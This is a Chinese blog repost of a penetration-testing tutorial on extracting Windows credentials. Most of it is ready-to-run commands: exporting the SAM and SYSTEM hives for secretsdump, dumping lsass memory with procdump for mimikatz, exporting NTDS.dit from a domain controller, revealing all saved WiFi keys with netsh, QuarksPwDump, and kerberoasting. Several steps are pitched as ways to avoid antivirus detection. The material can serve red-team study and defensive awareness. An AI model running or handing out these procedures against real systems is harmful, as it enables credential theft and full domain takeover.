内网渗透总结二:第二步管理员密码的明文和hash获取

最新推荐文章于 2024-06-02 09:38:58 发布
最新推荐文章于 2024-06-02 09:38:58 发布
阅读量3.9k 收藏 19
点赞数 1
分类专栏: 内网渗透挖掘 文章标签: 哈希算法 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/124605822
版权

文章出处:奇安信攻防社区-内网渗透-获取明文和hash (butian.net)

内网渗透-获取明文和hash

前言

在内网渗透中,获取用户账户的明文或hash至关重要,接下来我将详细介绍如何获取明文和hash。

利用secretsdump获取明文密码

SAM简介
SAM(安全账户管理器),SAM存放在注册表中,SAM用来存储Windows操作系统密码的数据库文件,为了避免明文密码泄露,SAM文件中保存的是明文密码经过一系列算法处理过的Hash值,被保存的Hash分为LM Hash(已废弃)和NTLMHash(长度32bit由字母数字组成),现在用户凭证是以NTLM HASH形式保存。在用户在本地或者远程登陆系统时,会将Hash值与SAM文件中保存的Hash值进行对比。在后期的Windows系统中,SAM文件中被保存的密码Hash都被密钥SYSKEY加密,接下来将对sam进行利用。

**使用该方法的好处:**可以不用在目标主机上上传任何的文件,只需要将湖区的文件导出到自己本机进行处理,可以绕过防护软件。

首先利用注册表命令将目标机的sam、security、system文件导出。

reg save hklm\sam C:\sam.save
reg save hklm\security C:\security.save
reg save hklm\system C:\system.save

将文件拷贝到我们自己的主机,这样可以不用在目标机上使用工具包,不用考虑免杀和环境问题,因为以上命令都是系统自带,使用secretsdump需要在python环境下,用impacket的 secretsdump脚本加载,在运行脚本时,需要将这些文件全部放在同一目录。并且需要先安装impacket模块,Python脚本才能正确运行。
secretsdum下载地址:百度网盘 请输入提取码
提取码:4534

secretsdumps.py -sam sam.save -security security.save -system system.save LOCAL
可以观察到各种都密码显示出来了

当然也可以使用mimikatz显示hash,这个只能显示部分hash。

利用Procdump+mimikatz配合获取hash与明文

Procdump是微软官方发布的工具,使用该工具可以绕过大多数的防护软件,procdump.exe把进程lsass.exe 的内存dump下来,将获取的lsass.dmp拷贝到本机上,再使用本机的mimikatz获取hash与明文
下载地址:
ProcDump - Windows Sysinternals | Microsoft Docs

进程lsass.exe中存在密码信息,使用Procdump获取lsass.exe中的信息
procdump -accepteula -ma lsass.exe lsass.dmp

将lsass.dmp导出到本机后,使用mimikatz获取明文密码,这样就可以不用将mimikatz传入到目标机中,可以防止mimikatz被杀的可能性。

privilege::debug  提升权限
sekurlsa::minidump lsass.dmp 用mimikatz载入lsass.dmp
sekurlsa::logonPasswords full   获取明文密码和hash

NTDS.dit获取域控hash

Windows系统为了保证用户明文密码不会被泄漏,将密码转换为HASH值进行身份验证,被保存在SAM或者ntds.dit中(mimitakz,procdump等等),域中的所有账号密码存放在Ntds.dit,如果拿到,相当于拿到整个域权限。这个思路在域渗透中尤为重要,因为这里面包含着所有域用户的hash,当然该思路只对DC生效。使用该方法不用担心被杀毒软件查杀,因为不需要上传任何工具去目标机上。
手动导出NTDS.dit和System,放在c:\users\tmp目录下
ntdsutil "ac i ntds" ifm "create full c:\users\tmp" q q

提取用户hash,这里推荐使用NTDSDumpEx:
下载地址:Releases · zcgonvh/NTDSDumpEx · GitHub

NTDSDumpEx -d ntds.dit -s system -o domain.txt 获取hash,并且保存在domain.txt文件中

利用系统自带命令获取WIFI密码

使用系统自带命令不用担心被杀毒软件查杀
netsh wlan show profiles 系统命令获取登录过的WiFi名称

获取TP-LINK_5358中的WiFi密码
netsh wlan show profile name="TP-LINK_5358" key=clear

获取所有连接过的wifi密码:

for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do  @echo %j | findstr -i -v echo |  netsh wlan show profiles %j key=clear

利用WCE获取hash

Quarks PwDump 是开放源代码的 Windows 用户获取工具,这款工具是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。这款工具也分为32位和64位两个不同的版本,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。但使用Quarks PwDump有可能被查杀,因为毕竟不是微软官方的工具,并且需要powershell环境。
下载地址:百度网盘 请输入提取码
提取码:dzgw
http://code.google.com/p/quarkspwdump/(需要翻墙下载

QuarksPwDump -h 查看选项

QuarksPwDump -dhl 获取本地的hash

QuarksPwDump -dhdc 获取域内的hash值

利用kerberoast+mimikatz配合获取明文密码

SPN(服务主体名service principal name)是微软为了在域环境中方便管理资源而为每种资源分配设计的一种表示方法(或者说SPN是使用Kerberos身份验证的网络中唯一的标识符),凡是使用Kerberos身份验证的网络中,都必须在机器账号或用户账号下为服务注册SPN(每个使用Kerberos的服务都需要一个SPN)在内网中,SPN扫描通过查询向域控服务器执行服务发现。这对于红队而言,可以帮助他们识别正在运行重要服务的主机,如终端,交换机等。SPN的识别是kerberoasting攻击的第一步。
使用该方法有两个缺点:1.需要powershell 2.mimikatz容易被杀毒软件查杀
查看指定域ROOTKIT.ORG注册的SPN:setspn -T ROOTKIT.ORG -Q */* 如果指定域不存在,则默认切换到查找本域的SPN

Setspn -q */* 获取所有服务

这里搜索MSSQL服务
Setspn -q */* | findstr "MSSQL"

将票据导出
kerberos::list /export

查看所有的票据

kerberoast下载地址:GitHub - nidem/kerberoast
在运行时需要在python3以上的环境运行,不然会报错
爆破出密码

yggcwhat
关注
  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透笔记】域内密码凭证获取
白菜猪肉炖粉条
12-28 1682
Volume Shadow Copy 活动目录数据库 ntds.dit 活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因此想要破解sam文件和ntds.dit文件都需要拥有一个system文件 ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit system文件位置:%SystemRoot%\System32\config\SYSTEM sa
内网横向移动密码凭证获取总结.pdf
12-08
总的来说,内网横向移动中的密码凭证获取涉及多种技术和工具,包括利用注册表备份、内存分析以及哈希传递。了解这些方法对于网络安全防御者来说至关重要,因为它们能帮助识别潜在的攻击途径,并采取相应的保护措施,...
域渗透——获取用户明文密码
Ping_Pig的博客
04-23 3709
目录 讲在前面: 一、CredSSP获取明文密码 、Dcsync获取明文密码 讲在前面: 本文是笔者在学习"三好学生"前辈的文章进而总结的一篇文章,内容主要是在内网渗透中获得明文密码的两种方式。,在笔者看来,两种办法都有一定的限制性和局限性,当然还有其他的办法,这需要笔者进一步的继续深入学习从而总结。 一、CredSSP获取明文密码 CredSSP的研究文章的文章通过CredSSP导出用户的明文口令。这篇文章已经分析的非常清楚如何使用,以及使用的场景,当然优缺点也给大家进行了展示,这里不做赘
Kali渗透测试:散列密码破解
Liu_Bruce的博客
05-26 4158
Kali渗透测试:散列密码破解 某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。 被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到
探索Windows系统深层秘密 —— secretsdump.py详解与应用
最新发布
gitblog_00062的博客
06-02 982
探索Windows系统深层秘密 —— secretsdump.py详解与应用 项目地址:https://gitcode.com/fin3ss3g0d/secretsdump.py 在网络安全和渗透测试的领域中,深入理解目标系统的内部结构是至关重要的一步。今天,我们带来了一个强大且定制化的工具——secretsdump.py,这是基于著名的impacket库的一个增强版本,专为那些对安全研究充满热情...
内网渗透--提取域控NTDS
qq_62169455的博客
09-24 731
NTDS.DIT:为DC的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控上的用户(如域管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。位置:C:\Windows\NTDS该文件和SAM文件类似,是不能直接读取的,也不能复制。
内网渗透获取明文身份凭证
HWHXY的博客
02-25 829
内网渗透获取明文身份凭证 0 前言 下文主要是从《从0到1的CTFer成长之路》阅读所做的笔记,处于备忘的目的,主要内容是内网渗透获取控制主机的明文身份凭证的几种方法,归纳角度从原理和方法两个角度写。。 1 LSA Secret 原理 本地安全策略,存储私有数据,用户和系统的敏感数据都存储在LSA Secrets的注册表中 操作 开始--运行bai--(输入)regedit--回车 Secrets里面存在用户的一些default 方法 先导出注册表项 reg save hklm\sam C:\sa
如何通过破解hash获取管理员密码
12-28
如何通过破解hash获取管理员密码. 高手勿进。
密码学基础课件:第四章 Hash函数2.pdf
06-27
密码学基础》第四章主要讨论了Hash函数,这是信息安全领域中的一个重要概念。Hash函数,又称散列函数,是一种将任意长度输入(也称为预映射或消息)转化为固定长度输出的函数。这个输出通常称为散列值或消息摘要。...
Windows系统管理员账号密码Hash哈希解密工具[CSDN版]
03-02
该工具为本人原创,CSDN论坛首发, 功能为在线解密Windows系统管理员账号密码Hash哈希值。...至于获取Hash百度有方法,本工具可以解密你得到的Hash值, 成功率90%以上! 有些大长度结构复杂的密码会失败!
jhash::key:Java中的密码哈希实用程序
05-23
它可以使用PBKDF2 hmac SHA1 / SHA256 / SHA512,BCRYPT或SCRYPT来对密码进行哈希处理,并且可以自动添加盐并且具有Pepper选项。下载Maven: < dependency> < groupId>...
QuarksPwDump.exe
06-24
QuarksPwDump.exe
Python实现通过文件路径获取文件hash值的方法
09-21
主要介绍了Python实现通过文件路径获取文件hash值的方法,结合实例形式分析了Python针对文件进行hash运算的实现方法与相关注意事项,需要的朋友可以参考下
PwDump7.exe
07-10
PwDump7 一次性导出系统全部帐号的HASH工具。渗透人员及网管必备
SharpSecDump:.Impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口
03-19
夏普转储 impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口。默认情况下,在当前用户的上下文中运行。请仅在您拥有或有权测试的环境中使用:) 用法 SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local 必需标志 -target-逗号分隔的要扫描的IP /主机名列表。请不要在地址之间包含空格。通过将target设置为127.0.0.1,还可以在本地系统上转储哈希。 可选标志 -u-要使用的用户名,如果要使用备用凭据来运行。必须与-p和-d标志一起使用 -p -明文密码才能使用,如果你想使用备用凭据运行。必须与-u和-d标志一起使用 -d-要使用的域(如果要使用备用凭据运行)(对于本地域)。必须与-u和-p标志一起使用 -threads-用于并发枚举多个
QuarksPwDump_v0.1.zip
03-16
先看简介 Quarks PwDump是一个Win32环境下系统授权信息导出工具,目前除此之外还木有没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,(包括xP/2003/Vista/7/2008/8),经测试相当稳定。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。 源地址在这:http://code.google.com/p/quarkspwdump/ 可以导出 : - Local accounts NT/LM hashes + history 本地NT/LM哈希+历史登录记录 - Domain accounts NT/LM hashes + history 域中NT/LM哈希+历史登录记录 - Cached domain password 缓存里的域密码 - Bitlocker recovery information (recovery passwords & key packages) 使用了Bitlocker的恢复信息(恢复密码&关键包) 用法参考说明如下: quarks-pwdump.exe Options :参数 –dump-hash-local /*Dump出本机HASH*/ -dump-hash-domain-cached /*Dump出域内缓存的Hash*/ -dump-hash-domain (NTDS_FILE must be specified) /*Dump出域内的Hash,NTDS_FILE必须被指定*/ –dump-bitlocker (NTDS_FILE must be specified) /*Dump出BitLocker遗留信息*/ –with-history (optional) -output-type JOHN/LC (optional, if no=>JOHN) /*导出为Lc4或John The Ripper支持的格式*/ –output FILE (optional, if no=>stdout) /*导出结果到文件*/ 木有其他系统 请大家另行测试。 如需导出可以 C:\>quarkspwdump --dump-hash-local --output c:\xxxxx C:\>quarkspwdump --dump-hash-local --output-type LC --output c:\xxxxx
Windows域内密码凭证获取 (゚益゚メ) 渗透测试
qq_53058639的博客
01-14 562
和我们常规Windows电脑不同的是,域中的账户密码采用的是集中管理而非本地模式,所以一旦我们拿到了域控(DC),就可以拿到域中所有用户的口令。注:下方所有演示的目标机是在一台域控中进行的,我们常规电脑和域中非域控电脑都无法进行下列操作!
【内网学习】3.windows hash抓取
gclome的博客
03-05 2302
目录 6.1 mimikatz 6.2 wce 6.3PwDump 6.4 Quarks PwDump 6.5 prcodump+mimikatz 6.6 注册表+mimikatz 6.7 LaZagne 1 mimikatz 工具下载地址:Releases · gentilkiwi/mimikatz · GitHub 在cmd的命令里输入 privilege::debug //提升权限 sekurlsa::logonpasswords //抓取密码 结果如下,
Windows密码凭证获取学习
crowsec
08-08 4561
一般来说,在我们获取到Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
用python和密码学的hash加密算法写一个区块链技术的简单系统
05-30
好的,以下是使用Python和SHA-256哈希算法实现一个简单的区块链系统的代码: ```python import hashlib import datetime class Block: def __init__(self, data, previous_hash): self.timestamp = datetime.datetime.now() self.data = data self.previous_hash = previous_hash self.hash = self.calculate_hash() def calculate_hash(self): block_contents = str(self.timestamp) + str(self.data) + str(self.previous_hash) block_hash = hashlib.sha256(block_contents.encode()).hexdigest() return block_hash class Blockchain: def __init__(self): self.chain = [self.create_genesis_block()] def create_genesis_block(self): return Block("Genesis Block", "0") def add_block(self, data): previous_hash = self.chain[-1].hash new_block = Block(data, previous_hash) self.chain.append(new_block) def is_valid(self): for i in range(1, len(self.chain)): current_block = self.chain[i] previous_block = self.chain[i-1] if current_block.hash != current_block.calculate_hash(): return False if current_block.previous_hash != previous_block.hash: return False return True ``` 上面的代码定义了一个`Block`类和一个`Blockchain`类。`Block`类用于表示区块,包含数据、时间戳、前一个区块的哈希值和当前区块的哈希值。`Blockchain`类用于管理区块链,包含一个区块链列表和添加区块、验证区块链等方法。 现在,我们可以创建一个区块链实例并添加一些区块: ```python blockchain = Blockchain() blockchain.add_block("This is block 1") blockchain.add_block("This is block 2") blockchain.add_block("This is block 3") ``` 每个区块的哈希值都是通过SHA-256哈希算法计算得出的,可以通过调用`calculate_hash()`方法来计算。验证区块链是否有效可以调用`is_valid()`方法,它会检查每个区块的哈希值和前一个区块的哈希值是否匹配。 ```python print("Blockchain is valid:", blockchain.is_valid()) ``` 输出: ``` Blockchain is valid: True ``` 现在,我们可以尝试篡改区块链,看看是否能够成功: ```python blockchain.chain[1].data = "This is block 1 - modified" ``` 这里将第个区块的数据修改了一下。再次验证区块链是否有效: ```python print("Blockchain is valid:", blockchain.is_valid()) ``` 输出: ``` Blockchain is valid: False ``` 可以看到,现在区块链已经失效了,因为第个区块的哈希值已经发生了改变。 这就是使用Python和SHA-256哈希算法实现一个简单的区块链系统的方法。当然,这只是一个简单的示例,实际的区块链系统还需要进行更多的优化和改进。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值